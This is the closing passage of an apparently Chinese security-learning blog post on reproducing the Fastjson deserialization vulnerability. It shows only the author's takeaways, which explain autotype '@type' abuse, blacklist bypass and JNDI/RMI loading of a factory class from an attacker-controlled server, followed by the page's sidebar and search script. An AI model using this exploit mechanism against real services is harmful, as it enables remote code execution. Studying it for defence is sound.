class="line">org.mozilla.javascript</span><br><span class="line">org.python.core</span><br><span class="line">org.springframework</span><br></pre></td></tr></table></figure>

<h2 id="心得"><a href="#心得" class="headerlink" title="心得"></a>心得</h2><p>1、 Fastjson主要还是利用了autotype功能实现”@type”字段指定反序列化的Class类型，所以尽量关闭autotype就没有问题。虽然Fastjson在1.2.24之后实现了一套黑名单，但还是存在被绕过风险。</p>
<p>2、 rmi在fastjson中的利用只是jndi的一种手段，还有ldap等。是在rmi服务器上绑定reference对象，与rmi本身的反序列话不是很有关系。它将从攻击者控制的服务器获取工厂类，然后实例化工厂以返回 JNDI所引用的对象的新实例。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/02/13/gadget%E9%93%BE%E5%AD%A6%E4%B9%A0/Commons%20Collections/1/" rel="next" title="gadget链学习/Commons Collections/1">
                <i class="fa fa-chevron-left"></i> gadget链学习/Commons Collections/1
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/02/25/XSS%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/XSS%E7%BC%96%E7%A0%81%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3/" rel="prev" title="XSS绕过总结/XSS编码深入理解">
                XSS绕过总结/XSS编码深入理解 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/user.jpg"
                alt="Virusday" />
            
              <p class="site-author-name" itemprop="name">Virusday</p>
              <p class="site-description motion-element" itemprop="description">学习的日常</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">75</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <!-- modify icon to fire by szw -->
                <i class="fa fa-history fa-" aria-hidden="true"></i>
                近期文章
              </div>
              <ul class="links-of-blogroll-list">
                
                
                  <li class="recent_posts_li">
                    <a href="/2021/11/01/%E5%8D%81%E6%9C%88%E6%95%B4%E7%90%86%E7%9A%84%E9%97%AE%E9%A2%98/1/" title="十月整理的问题/1" target="_blank">十月整理的问题/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/09/22/%E6%9D%82%E9%97%AE%E9%A2%98/1/" title="杂问题/1" target="_blank">杂问题/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/09/16/Oracle%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/1/" title="Oracle注入技巧/1" target="_blank">Oracle注入技巧/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/08/24/java/%E7%BB%95%E8%BF%87%E9%AB%98%E7%89%88%E6%9C%AC%E7%9A%84ldap+rmi/1/" title="java/绕过高版本的ldap+rmi/1" target="_blank">java/绕过高版本的ldap+rmi/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/07/19/java/java%E9%80%86%E5%90%91/1/" title="java/java逆向/1" target="_blank">java/java逆向/1</a>
                  </li>
                
              </ul>
            </div>
          
          
          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#追洞计划-WEB2-0-1-1-1-1-课程之Fastjson反序列化漏洞复现"><span class="nav-number">1.</span> <span class="nav-text">追洞计划:WEB2.0[1+1+1+1]课程之Fastjson反序列化漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#目录："><span class="nav-number">1.1.</span> <span class="nav-text">目录：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1、靶场搭建"><span class="nav-number">1.1.1.</span> <span class="nav-text">1、靶场搭建</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2、漏洞复现"><span class="nav-number">1.1.2.</span> <span class="nav-text">2、漏洞复现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3、漏洞分析"><span class="nav-number">1.1.3.</span> <span class="nav-text">3、漏洞分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4、漏洞修复"><span class="nav-number">1.1.4.</span> <span class="nav-text">4、漏洞修复</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5、心得"><span class="nav-number">1.1.5.</span> <span class="nav-text">5、心得</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#靶场搭建"><span class="nav-number">1.2.</span> <span class="nav-text">靶场搭建</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#坑点"><span class="nav-number">1.2.0.1.</span> <span class="nav-text">坑点</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞复现"><span class="nav-number">1.2.1.</span> <span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#一、-准备被远程下载的class文件"><span class="nav-number">1.2.1.1.</span> <span class="nav-text">一、 准备被远程下载的class文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#二、-http服务"><span class="nav-number">1.2.1.2.</span> <span class="nav-text">二、 http服务</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#三、RMI服务"><span class="nav-number">1.2.1.3.</span> <span class="nav-text">三、RMI服务</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞分析"><span class="nav-number">1.3.</span> <span class="nav-text">漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#一、-熟悉fastjson工作流程"><span class="nav-number">1.3.0.1.</span> <span class="nav-text">一、 熟悉fastjson工作流程</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#疑惑"><span class="nav-number">1.3.0.2.</span> <span class="nav-text">疑惑</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#总结"><span class="nav-number">1.3.0.3.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞修复"><span class="nav-number">1.4.</span> <span class="nav-text">漏洞修复</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#心得"><span class="nav-number">1.5.</span> <span class="nav-text">心得</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <!--
<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-id-card"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Virusday</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">103.8k</span>
  
</div>
-->


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Virusday</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>









        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
